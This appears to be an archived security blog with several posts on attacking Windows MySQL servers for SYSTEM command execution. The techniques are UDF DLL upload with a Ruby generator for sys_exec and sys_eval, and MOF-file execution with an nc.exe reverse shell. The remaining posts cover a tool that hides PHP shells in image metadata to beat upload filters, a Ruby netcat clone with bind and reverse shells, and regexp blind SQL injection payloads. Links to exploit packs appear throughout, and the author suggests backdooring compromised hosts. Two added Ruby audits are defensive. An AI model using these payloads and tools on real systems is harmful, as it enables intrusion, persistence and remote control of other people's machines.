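  def self.escape_path(path)
    path.gsub('\\') { '\\\\' }.gsub("'") { "\\'" }
  end

  # Fallback when @@plugin_dir is unavailable: basedir + lib\plugin\.
  def self.plugin_dir_from_basedir(basedir)
    basedir.end_with?('\\', '/') ? "#{basedir}lib\\plugin\\" : "#{basedir}\\lib\\plugin\\"
  end

  def self.join_win(dir, file)
    dir.end_with?('\\') ? dir + file : "#{dir}\\#{file}"
  end

  # SELECT 0x<hex> INTO DUMPFILE '<path>' writes the raw bytes unmodified
  # (needs the FILE privilege; the whole statement must fit max_allowed_packet).
  def self.dumpfile_sql(dll_bytes, target_path)
    "SELECT 0x#{dll_bytes.unpack1('H*')} INTO DUMPFILE '#{escape_path(target_path)}';"
  end

  def self.create_function_sql(name, returns, soname)
    "CREATE FUNCTION #{name} RETURNS #{returns.upcase} SONAME '#{soname}';"
  end

  # Whole sequence for lib_mysqludf_sys: upload, then register both functions
  # with the return types the library exports (int for sys_exec, string for sys_eval).
  def self.udf_install_plan(dll_bytes, plugin_dir, soname: 'lib_mysqludf_sys.dll')
    [
      dumpfile_sql(dll_bytes, join_win(plugin_dir, soname)),
      create_function_sql('sys_exec', 'int', soname),
      create_function_sql('sys_eval', 'string', soname)
    ]
  end
end

if $PROGRAM_NAME == __FILE__
  dll = "MZ\x90\x00".b # constructed stand-in for a real DLL's bytes
  puts MysqlUdfSql::PLUGIN_DIR_QUERY
  puts MysqlUdfSql.udf_install_plan(dll, 'C:\\mysql\\lib\\plugin\\')
end
```

Feeding the output through an injection point rather than a direct client changes nothing about the statements themselves, only whether stacked queries are available to run them.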
<br />
I have focused on Windows as it yields the greatest success. Unix systems are also vulnerable to the UDF attack (MOF is Windows only), but on most modern systems the plugin directory is root-owned and often covered by an AppArmor or SELinux profile, so the MySQL service account cannot write to it. This means you would need MySQL running as root to pull it off, which is not very common, but you never know. That said, it is a nice way to backdoor a system post compromise, as you can leverage the sys_exec() or sys_eval() functions for command execution as a way back in. These functions can be reached over a direct connection or through SQL injection, anywhere you can execute SQL queries that call them, so I am sure you can think of some sneaky way to use it.<br />
<br />
<b>VIDEO DEMO: </b><a href="http://youtu.be/N0fn2dWlUFI" target="_blank">YouTube</a><br />
<br />
<b>Download Full Exploiter Pack: <a href="http://uppit.com/48e6d2lfnsyy/myudf.zip" target="_blank">DOWNLOAD</a></b><br />
<b>NOTE:</b> contains UDF DLLs for sys exec functions as well as template for reverse shell in /payloads<br />
<br />
<b>UPDATE: </b>You can now find this on my Github page here: <a href="https://github.com/Hood3dRob1n/SQLi">https://github.com/Hood3dRob1n/SQLi</a> <br />
<br />
<b>Pure Ruby Core Source Code: <a href="http://pastebin.com/yTY7aKtF" target="_blank">PASTEBIN</a></b><br />
<br />
Hope you have enjoyed this two-part series. These methods can be used outside of MySQL exploitation, but this is an angle I was not previously familiar with, and it yields very high payouts when it works, so I thought I would share and highlight it for others.... <br />
<br />
Until next time, Enjoy!<br />
<br />
<b>Battling Windows MySQL: From root to SYSTEM (Part I: MOF Exploitation)</b> (posted 2013-10-19)<br />
In this two part series I am going to share two methods you can use to gain command execution against Windows MySQL instances when you have a privileged MySQL user account. First, here in part one, I will cover the MOF exploitation technique, and then in part 2 I will go over the UDF (User Defined Function) DLL injection method. They both exploit the MySQL service, which on Windows typically runs as SYSTEM, so this can be a very high payout for the exploit as SYSTEM level access means full compromise of the local box if successful. The MOF exploit is very stable and works against pre-Vista machines like XP and Server 2003, while the UDF method has fewer restrictions.<br />
<br />
<u><b>What the heck is a .MOF File?</b></u><br />
First and foremost this is a Windows specific file format, so it automatically rules out non-Windows based targets, sorry. Some nice quotes I pulled from the web: "A MOF file contains MOF language statements, compiler directives and comments". "A MOF file can be encoded in either Unicode or UTF-8 format. MOF files are text files that contain definitions of classes and instances using the Managed Object Format (MOF) language." We can leverage their design to use JScript, ActiveXObject and WScript.Shell to run commands or whatever other cool wizardry you can come up with. The code in these files is fairly harmless until it is compiled by a binary tool which comes on Windows boxes called 'mofcomp.exe'. The Managed Object Format (MOF) compiler (mofcomp.exe) parses the passed files and adds the classes and class instances defined in the file to the WMI repository, which allows the magic to happen. If you want to read more on mofcomp.exe check <a href="http://msdn.microsoft.com/en-us/library/aa392389%28v=vs.85%29.aspx" target="_blank">here</a>. If you want to write your own custom .MOF file to do even more whimsical magic sorcery, read up on the specs and requirements <a href="http://www.dmtf.org/sites/default/files/standards/documents/DSP0221_3.0.0.pdf" target="_blank">here</a>. <br />
<br />
Now in pre-Vista Windows there is a magical home for .MOF files which need compiling by the mofcomp.exe tool, and this is at 'c:\windows\system32\wbem\mof\'. Apparently on pre-Vista versions this directory is periodically scanned for new additions. Anything new it finds is passed along to mofcomp.exe and auto-compiled, no human interaction needed. This is our ticket to privilege escalation, or our way in when it comes to exploiting MySQL for command execution with this technique. On Windows MySQL tends to run as a privileged user and as a result there are no default restrictions on where this user can write - which means we can write files to this magic directory as the MySQL user! If we can craft a .MOF template sneaky enough and write it there, it will be auto-compiled, running the code inside. I should note that after it is compiled by mofcomp.exe it is moved into the 'c:\windows\system32\wbem\mof\<b>good</b>\' directory; if anything fails during compiling it is moved to 'c:\windows\system32\wbem\mof\<b>bad</b>\'. It is worth mentioning that there is also a log file for all mofcomp.exe actions taken, which can be found at 'c:\windows\system32\wbem\Logs\mofcomp.log'. This log contains a time-stamp and reference to the files compiled along with any errors encountered.<br />
<br />
<b>FUN FACT:</b> If you write files here and have them compiled, they will run repeatedly until deleted. Also due to this cyclical nature you can end up with commands occasionally running one more time even after removal of the actual .MOF payload file. For example, if you run a one-time instance to create a new user account, it will keep being created if the admin doesn't find the MOF file and simply keeps trying to delete the account itself..... re-appearing accounts for red team pranks anyone?<br />
<br />
<br />
<b>Connecting the dots to get a shell:</b><br />
Now that you know about this magical place, and you have read my previous tutorials on writing files with MySQL, this won't be a giant leap for us. We first need to come up with a way to upload a binary file from our local machine to the remote machine. In order to do this we read the file in binary mode, then convert it to hex formatting to make injection easy. We will also make a point of using DUMPFILE so it's written as a single line and won't mess with our binary format. The write itself happens almost instantly, but it may take a minute or two for the file to get scanned and run, so be patient before completely walking away.<br />
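Both the MOF write described here and the UDF loading in Part II depend on the same primitive: a MySQL account holding the FILE privilege (required for INTO DUMPFILE) on a server whose secure_file_priv does not restrict where files land. The Ruby below is an added defensive audit, not code from the post or the exploiter packs; it parses constructed SHOW GRANTS, SHOW VARIABLES and mysql.func output (the account names, paths and rows are made-up samples) and rates the exposure.

```ruby
# Added audit example (not the post's code). Inputs are constructed samples
# shaped like what a MySQL client returns; replace them with live query output.

# SHOW GRANTS FOR <account>, one array of grant lines per account (constructed)
SAMPLE_GRANTS = {
  "'root'@'localhost'"  => ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"],
  "'webapp'@'10.0.0.%'" => ["GRANT USAGE ON *.* TO 'webapp'@'10.0.0.%'",
                            "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'webapp'@'10.0.0.%'"],
  "'report'@'%'"        => ["GRANT SELECT, FILE ON *.* TO 'report'@'%'"],
}.freeze

# SHOW VARIABLES, as name => value (constructed; plugin_dir is a placeholder path)
SAMPLE_VARIABLES = {
  'secure_file_priv' => '',                          # empty: files may be written anywhere
  'plugin_dir'       => 'C:\\mysql\\lib\\plugin\\',  # where a UDF DLL would have to land
}.freeze

# SELECT name, dl FROM mysql.func (constructed rows)
SAMPLE_FUNC_ROWS = [
  { name: 'sys_eval', dl: 'lib_mysqludf_sys.dll' },
].freeze

# Only global (*.*) grants matter here: FILE cannot be granted per database.
GLOBAL_GRANT_RE = /\AGRANT (?<privs>.+?) ON \*\.\* TO /

def file_write_capable?(grant_lines)
  grant_lines.any? do |line|
    m = GLOBAL_GRANT_RE.match(line)
    next false unless m
    privs = m[:privs].split(',').map { |p| p.strip.upcase }
    privs.include?('ALL PRIVILEGES') || privs.include?('ALL') || privs.include?('FILE')
  end
end

def secure_file_priv_status(value)
  case value
  when nil, 'NULL' then :disabled                  # server refuses file import/export entirely
  when ''          then :unrestricted              # any path the mysqld process can write
  else                  :restricted_to_directory   # only inside the named directory
  end
end

# Function names from the lib_mysqludf_sys package the post describes.
SUSPECT_UDF_NAMES = %w[sys_exec sys_eval].freeze

def suspicious_udfs(func_rows)
  func_rows.select do |row|
    SUSPECT_UDF_NAMES.include?(row[:name].downcase) || row[:dl] =~ /mysqludf_sys/i
  end.map { |row| row[:name] }
end

def audit_file_write_exposure(grants, variables, func_rows)
  accounts = grants.select { |_, lines| file_write_capable?(lines) }.keys
  spriv    = secure_file_priv_status(variables['secure_file_priv'])
  udfs     = suspicious_udfs(func_rows)
  risk = if !udfs.empty? || (!accounts.empty? && spriv == :unrestricted)
           :high     # OS-command UDFs present, or the write primitive is fully open
         elsif !accounts.empty?
           :medium   # FILE holders exist but secure_file_priv fences them in
         else
           :low
         end
  { file_write_accounts: accounts, secure_file_priv: spriv,
    plugin_dir: variables['plugin_dir'], loaded_udfs: udfs, risk: risk }
end

if __FILE__ == $0
  report = audit_file_write_exposure(SAMPLE_GRANTS, SAMPLE_VARIABLES, SAMPLE_FUNC_ROWS)
  puts "accounts able to write files : #{report[:file_write_accounts].join(', ')}"
  puts "secure_file_priv             : #{report[:secure_file_priv]}"
  puts "plugin_dir to watch for DLLs : #{report[:plugin_dir]}"
  puts "sys UDFs already registered  : #{report[:loaded_udfs].join(', ')}"
  puts "overall risk                 : #{report[:risk]}"
end
```

Setting secure_file_priv to a dedicated directory (or NULL) and removing FILE from application accounts closes the write path both parts of this series rely on; rows in mysql.func pointing at lib_mysqludf_sys are an indicator that it has already been used.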
<br />
Ruby Code to Read Binary and Upload (passed a db connection object, the local file path, and the destination path on target):<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=HwR1Xhq1"></script>
<br />
Now when it comes to the .MOF template for code execution with this method I borrowed what I could find to suit my needs. I actually found a random PHP version of this exploit sitting on a server I was auditing! It was using a simple template to run commands one at a time through WScript.Shell.run(), so I used that as a base for command execution as it compiles without issues in all my tests. I then took the beefier version from MSF, found in the /msf/lib/msf/core/exploit/wbemexec.rb script and used for their version of this exploit. This .MOF template takes the location of a binary.exe to run (it also has some built-in cleanup code to remove files after). We can use either template to our liking: the simpler template to execute a single command at a time, or the fancy template to run a binary (which we need to upload beforehand). I came up with some code to leverage these features and techniques to achieve code execution, raw binary file uploading via SQL, and a reverse shell via uploading of nc.exe and then running a single command to call home with cmd.exe attached. Below is a quick video demonstration to show you how things can work with the MOF exploit when you find yourself with privileged user access to MySQL on a Windows box. You can also find the source code and download links below that. <br />
<br />
<u><b>VIDEO:</b></u> <a href="http://youtu.be/6bsoqDHtKlY" target="_blank"><b>YouTube</b></a><br />
<br />
<b><u>Download Full Exploiter Pack:</u></b> <a href="http://uppit.com/tmhmzm7082ie/mymof.zip" target="_blank"><b>DOWNLOAD</b></a><br />
<b>NOTE: </b>Contains nc.exe & sbd.exe in /payloads<br />
<br />
<b>UPDATE:</b> You can now find this on my Github page here: <a href="https://github.com/Hood3dRob1n/SQLi">https://github.com/Hood3dRob1n/SQLi</a><br />
<br />
<u><b>Pure Ruby Core Source Code: </b></u><a href="http://pastebin.com/grQkk79T" target="_blank"><b>PASTEBIN</b></a><br />
<b>Food for thought: </b>This method supposedly doesn't work on newer instances due to them not auto-compiling the .MOF files like we see done with XP and 2k3 systems. Not tested, but curious what happens if we pre-compile with mofcomp.exe ourselves and then write to the updated /good/ location.....<br />
<br />
Until next time, Enjoy!<br />
<br />
<b>OhNo - The Evil Image Builder & Meta Manipulator</b> (posted 2013-10-07)<br />
Today I would like to share a little something I made for fun. I previously made a posting on how to bypass general client side checks for uploading shells through open or administrative panels <a href="http://kaoticcreations.blogspot.com/2011/11/how-to-upload-shell.html" target="_blank">here</a>, well my buddy decided to one up me with an even better posting which you can read here: <a href="http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html">http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html</a>. In his write-up he talks about embedding PHP code within image tags to bypass weak server side checks which might only be using getimagesize() to verify it is a real image. In cases where this is beatable and there is no or minimal filename re-writing you can get creative, as he outlines in his posting, to get a shell. This method can also be very effective in exploiting include() type vulnerabilities with evil avatars as well! Anyways, he demonstrated things using a tool on Windows so I did some quick looking to see if I could replicate the functionality in Ruby, turns out you can :)<br />
<br />
<a href="https://github.com/janfri/mini_exiftool" target="_blank">Mini_Exiftool</a> to the rescue! As they describe it on their Github page "This library is a wrapper for the Exiftool command-line application (<a href="http://www.sno.phy.queensu.ca/~phil/exiftool/">http://www.sno.phy.queensu.ca/~phil/exiftool/</a>) written by Phil Harvey. You will get the full power of Exiftool to Ruby: Reading and writing of EXIF-data, IPTC-data and XMP-data." If you don't know anything about metatags, EXIF data or what I've been talking about then go check out the Exiftool site to read a bit more about it and how it works, as it will help you understand what's going on under the hood. <br />
<br />
For a quick summary (and for the lazy): this tool can be used to read and dump the meta tags and meta values off of files, as well as remove and re-write the tag values in many cases. What all is in there? All kinds of random data can be found in the metadata, from manufacturer information for the device which took the picture or recording, to the latitude and longitude of where a photo was taken, to who originally authored a document and when, even contact info and emails. There is a great wealth of information available sometimes if you just look! <br />
<br />
In our case we will be taking advantage of all that spare space, as r0ng demonstrated, to store (evil) PHP code in image files. I made a simple tool leveraging the Mini_Exiftool gem to automate the process and make it a bit easier for the average user, and because I felt like also making a small GUI for things (more fun with Tk bindings). You can find most of the Mini-Exiftool functionality covered in their <a href="https://github.com/janfri/mini_exiftool/blob/master/Tutorial.rdoc" target="_blank">tutorial</a>, so I won't go over too much as I mostly just linked small functions shown there to fit the command line options parsed by optparse, not too much magic here. You can set options as arguments and run how you like, or run in GUI mode and do it all from there. <br />
<br />
Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hZl8XPV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/hZl8XPV.png" width="340" /></a></div>
<br />
Dump All Tags and associated Tag Values for file:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/HhBmPCp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/HhBmPCp.png" width="340" /></a></div>
<br />
Write to Tag (it will try to create if it doesn't exist):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/RFYQ0HL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/RFYQ0HL.png" width="400" /></a></div>
<br />
<br />
Dump after to confirm file write:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kthkvhk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i.imgur.com/kthkvhk.png" width="400" /></a></div>
<br />
<br />
If you set the value to nothing and write it will remove the tag (& value):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/gCAc5ED.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i.imgur.com/gCAc5ED.png" width="400" /></a></div>
<br />
Dump after to confirm:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ds1aB0Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/ds1aB0Q.png" width="303" /></a></div>
<br />
<br />
I also created a nuke (-n) option which simply automates the above null write process to remove the tag. The Exiftool CLI and even the gem have more functionality to adjust timestamps and more subtle details; I kept it simple for now, so mostly just string values for tags which are writable and hold string values. As a general rule of thumb the 'Comment' tag is almost always writable and/or can be created and written to. Perhaps in the future I will try to further extend it to allow such functionality, but for now it does what it needs to: embed PHP shell code in images ;)<br />
<br />
Embedding r0ng Shell from CLI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/cZR3wR1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="http://i.imgur.com/cZR3wR1.png" width="400" /></a></div>
<br />
<br />
Hex Dump to Confirm:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hXIeMLW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="http://i.imgur.com/hXIeMLW.png" width="400" /></a></div>
<br />
Bypass Uploader restrictions or new .htaccess (AddType application/x-httpd-php .png) as described in previous write-ups and then execute your shell in Browser:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LeFlFol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i.imgur.com/LeFlFol.png" width="400" /></a></div>
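For the defending side, the check that the getimagesize() approach above misses is a scan of the raw bytes for PHP open tags, plus a look at any uploaded .htaccess for the AddType/AddHandler trick. The Ruby below is an added example, not part of OhNo or the original post; the PNG-shaped blobs it scans are constructed inline (valid signature, one tEXt chunk, zero CRC) and are not real images.

```ruby
# Added upload-side scanner (not OhNo's code). A valid image header is not
# enough: the bytes are also searched for PHP open tags, and an .htaccess
# uploaded alongside is checked for directives that make images execute.

PHP_MARKERS = ['<?php', '<?=', '<script language="php"'].freeze

IMAGE_MAGIC = {
  'png'  => "\x89PNG\r\n\x1a\n".b,
  'jpeg' => "\xFF\xD8\xFF".b,
  'gif'  => 'GIF8'.b,
}.freeze

# The header-only test getimagesize() amounts to; returns 'png', 'jpeg', 'gif' or nil.
def detect_image_type(bytes)
  pair = IMAGE_MAGIC.find { |_, magic| bytes.b.start_with?(magic) }
  pair && pair.first
end

# Case-insensitive scan of the whole file (<?PHP is valid too); every hit with its offset.
def find_php_markers(bytes)
  hay = bytes.b.downcase
  PHP_MARKERS.flat_map do |marker|
    hits = []
    pos = hay.index(marker)
    while pos
      hits << { marker: marker, offset: pos }
      pos = hay.index(marker, pos + 1)
    end
    hits
  end
end

def audit_upload(bytes)
  type    = detect_image_type(bytes)
  markers = type ? find_php_markers(bytes) : []
  verdict = if type.nil?       then :reject_not_image
            elsif markers.any? then :reject_embedded_code
            else                    :accept
            end
  { image_type: type, php_markers: markers, verdict: verdict }
end

# Directives that hand a file extension to the PHP handler, as in the
# "AddType application/x-httpd-php .png" line mentioned above.
HTACCESS_PHP_RE = /^\s*(AddType|AddHandler|SetHandler)\s+\S*php/i

def htaccess_executes_uploads?(content)
  content.each_line.any? { |line| line =~ HTACCESS_PHP_RE }
end

# --- constructed samples: PNG signature plus one tEXt chunk with a zero CRC,
# enough to exercise the scanner, not a valid image ---
PNG_SIGNATURE = "\x89PNG\r\n\x1a\n".b

def png_text_chunk(keyword, text)
  data = "#{keyword}\0#{text}".b
  [data.bytesize].pack('N') + 'tEXt'.b + data + "\0\0\0\0".b
end

CLEAN_PNG   = PNG_SIGNATURE + png_text_chunk('Comment', 'holiday photo')
TAINTED_PNG = PNG_SIGNATURE + png_text_chunk('Comment', "<?PHP echo 'tagged'; ?>")

if __FILE__ == $0
  [CLEAN_PNG, TAINTED_PNG, 'plain text'.b].each do |blob|
    r = audit_upload(blob)
    puts "#{r[:image_type].inspect}: #{r[:verdict]} #{r[:php_markers].inspect}"
  end
  puts "htaccess remaps to PHP: #{htaccess_executes_uploads?("AddType application/x-httpd-php .png\n")}"
end
```

Re-encoding uploads through an image library and serving them from a path where .htaccess is ignored removes both halves of the trick even when a marker scan misses an encoding variant.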
<br />
<br />
I added a -u option which will help quickly build all possible upload filenames. I know I often tend to forget one or two when I do it 100% manually, so this just helps me build a folder so I can then run through them all in hopes one will sneak past weak filters and checks.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/VkYn6db.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/VkYn6db.png" width="400" /></a></div>
<br />
Launch in GUI mode:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mQpqg10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/mQpqg10.png" width="400" /></a></div>
<br />
<br />
Embedding Sneaky Shell from GUI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/iajWLnh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/iajWLnh.png" width="400" /></a></div>
<br />
<br />
I only tested it with image files as that was my main target, but I do believe you should also be able to use the general viewing, deleting and writing with any file Exiftool would support (i.e. PDF, Word, Excel, etc). The <a href="http://www.digininja.org/projects/cewl.php" target="_blank">CeWL</a> password list generator tool is another Ruby project which leverages metadata to help profile corporate targets for password auditing purposes; read more about that project <a href="http://www.digininja.org/projects/cewl.php" target="_blank">here</a>. Please let me know how things work for you and how else this might be useful to you so I can try to improve as time allows.<br />
<br />
<b>DOWNLOAD:</b> Zip File w/Gemfile, Both Source Files, and a few Sample Images: <a href="http://uppit.com/l2r0chwr6q4t/OhNo.zip" target="_blank">DOWNLOAD</a><br />
<br />
<u><b>Getting things working:</b></u><br />
Ruby TK Bindings Needed for GUI Support:<br />
<b>COMMAND:</b> apt-get install tk libtk-ruby<br />
<br />
If require 'tkextlib/tile' throws in `require': TkPackage can't find package tile (RuntimeError)<br />
<b>COMMANDS:</b> teacup install tile<br />
<br />
ExifTool CLI Installation: <a href="http://www.sno.phy.queensu.ca/~phil/exiftool/install.html">http://www.sno.phy.queensu.ca/~phil/exiftool/install.html</a><br />
<ul>
<li>Download file, run commands:</li>
<li>cd <your download directory></li>
<li>gzip -dc Image-ExifTool-#.##.tar.gz | tar -xf -</li>
<li>cd Image-ExifTool-#.##/</li>
<li>perl Makefile.PL</li>
<li>make test</li>
<li>sudo make install</li>
</ul>
Once pre-requisites above are met:<br />
<b>COMMANDS: </b><br />
<ul>
<li>wget http://uppit.com/l2r0chwr6q4t/OhNo.zip</li>
<li>unzip OhNo.zip</li>
<li>cd OhNo/</li>
<li>bundle install</li>
<li>./ohno -h</li>
</ul>
<br />
Source Code for Full All in One, also outlined below (CLI & GUI): <a href="http://pastebin.com/yi7YKmPz" target="_blank">SOURCE</a><br />
<br />
Source Code for Standalone CLI Version (NO GUI): <a href="http://pastebin.com/fmYxj1aH" target="_blank">SOURCE</a><br />
<br />
Raw All in One Code:<br />
<script src="http://pastebin.com/embed_js.php?i=yi7YKmPz"></script>
<br />
Hope this is helpful to someone out there....<br />
<br />
Until next time, Enjoy!<br />
<br />
<b>RubyCat - A Pure Ruby NetCat Alternative</b> (posted 2013-10-04)<br />
It's been a while, and one of the last things I posted was about me off having fun learning Ruby, so I thought I might share one of the more useful pieces of code I was able to come up with. I mashed up my reverse shell, my bind shell, and a simple sockets connector and listener and came up with a simple to use script to simulate most of the basic or common tasks one might use Netcat for. As you know Netcat is often limited, flagged, or compiled without the -e GAPING_SECURITY_HOLE option enabled, which can make life hard on us as testers. This is one more thing you can add to the old bag of tricks to wiggle out of such situations if Ruby is available to you. It uses all standard libs so should work on any system with a relatively recent Ruby version installed, although I honestly have not widely tested it out yet, so perhaps you can share your feedback with me to help improve it a little. Some quick examples to highlight basic usage....<br />
<br />
Open a listener on local machine using port 31337 and catch a reverse shell from somewhere:<br />
<b>COMMAND: </b>./rubycat.rb -l -p 31337<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/cdtKLJz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/cdtKLJz.jpg" width="400" /></a></div>
<br />
Connect to a Bind Shell you have waiting somewhere else:<br />
<b>COMMAND: </b> ./rubycat.rb -c -i 127.0.0.1 -p 5151<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ymIg8b4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/ymIg8b4.jpg" width="400" /></a></div>
<br />
Launch a Bind Command Shell on localhost on port 31337 with password (default password is 'knock-knock'):<br />
<b>COMMAND: </b>./rubycat.rb -b -p 31337 -P s3cr3tp@ss<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/qFsNenL.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/qFsNenL.jpg" width="400" /></a></div>
<br />
<b>NOTE: </b>If you enter the wrong pass, it will print funny message then go silent. You have to re-connect to try and login again.<br />
<br />
Launch a Command Reverse Shell to provided IP and Port:<br />
<b>COMMAND:</b> ./rubycat.rb -r -i 127.0.0.1 -p 31337<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6rg4IH4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/6rg4IH4.jpg" width="400" /></a></div>
<br />
The 328 lines of Ruby which make it all possible: <a href="http://pastebin.com/Z7eFKFDm" target="_blank">LINK</a><br />
<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=Z7eFKFDm"></script>
Hope this is useful to someone out there....<br />
<br />
Until next time, Enjoy!<br />
<br />
<b>MySQL Regexp Conditional Errors & Faster Blind Injections</b> (posted 2013-10-04)<br />
Today I am going to share a SQL injection method which was new to me: using Regexp conditional errors to speed up blind injections. Some might call it error based; I will stick to calling it blind myself - you can decide after you read. I will focus on MySQL today, but it is also very similar in MS-SQL with RLIKE so you should be able to connect the dots without too much trouble. I did not invent this or discover it, but I did automate it in Ruby and thought I would share a bit to help highlight it more in hopes others will pick up on it. I have asked and looked around and it doesn't seem to be a widely known or covered topic, so I thought it would make for a decent blog write up...<br />
<br />
<br />
Some quick background and helpful links which may give some better insights or get your mind going on how else you can toy with injections and Regexp after reading this article:<br />
<ul>
<li>Original Write-Up on this subject which influenced me:</li>
<ul>
<li>Speeding up Blind SQL Injections using Conditional Errors in MySQL (for which this is a repeat of and my code based on): <a href="http://ha.xxor.se/2011/06/speeding-up-blind-sql-injections-using.html" target="_blank">LINK</a> </li>
</ul>
<li>Apparently, this is the original writeup on the topic (in Russian), which led to the above posting being done: <a href="http://qwazar.ru/?p=26" target="_blank">LINK</a> </li>
<li>Other helpful links in understanding uses of Regexp and RLIKE:</li>
<ul>
<li>Blind Sql Injection with Regular Expressions Attack, by IHTeam: <a href="http://packetstorm.foofus.com/papers/database/blind-sqli-regexp-attack.pdf" target="_blank">LINK</a> </li>
<li>REGEXP based SQL INJECTION attacks by nullbyt3: <a href="http://securityoverride.org/articles.php?article_id=116" target="_blank">LINK</a></li>
</ul>
</ul>
<br />
Available Error Messages from the various Regexp conditions it can encounter while performing pattern matching:<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=6JKQ1cNS"></script>
As you can see there is a lot available to work with. I highly recommend checking out all of the above links, especially the first one, if you have any time at all as it will likely explain things better than I can. Long story short, we can use Regexp to control MySQL error messages based on the query provided, in addition to using it for pattern matching. How is this helpful though? Well, in a typical boolean based blind injection you have to play twenty questions to extract your results. This often results in a very high number of requests, which in turn can be very loud & time consuming. If you have the ability to generate verbose error messages on a page then we can likely use Regexp to tweak our normal attack method. Now Regexp actually has 10 possible error messages as noted above, and we will use this to our advantage in our attack. Most importantly, this means we can actually ask 10 questions with each query we send if we structure things right! Can you see the potential time savings yet? Let's continue and help clarify more...<br />
<br />
<u>How to test if Regexp Conditional Error Method can be used?</u><br />
<b>Get it to throw an error of course! </b><br />We can mirror the approach one would normally take with a boolean type injection to test if 1=1, however in this case on a true statement the regexp statement evaluates to true and thus returns 1, making our 1=1 query true. In the false case it results in a malformed regexp string being returned which is what actually generates the verbose error messages.<br />
<br />
Quick illustration through simple walk-through. First we find your typical SQL Error message as we are walking a site... <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/O9hdJFs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://i.imgur.com/O9hdJFs.png" width="320" /></a></div>
<br />
Now for our purposes we test a true statement embedded in a regexp statement. It should not cause any errors and should return normal page results: the inner IF evaluates to true and returns a value of 1, making the regexp match true, which in turn makes our 1=1 a true statement.<br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF(1=1,1,''))-- -<br />
<b>ERROR MSG: </b>None<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/T30c0Nx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/T30c0Nx.png" width="400" /></a></div>
<br />
<b>NOTE: </b>You could use something like 'SELECT 1 REGEXP 1' to bypass simple filters which check for some default boolean injection tests like 'and 1=1'.<br /><br />Now we tweak our test injection to embed a false statement within our regexp and check for the regexp error response. It should be triggered because 1=2 returns false, which in turn returns '' back to the regexp, and the regexp engine rejects this since an empty expression is not a valid pattern to match.<br />
<br /><b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF(1=2,1,''))-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Yfg5xGZ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/Yfg5xGZ.png" width="400" /></a></div>
<br />
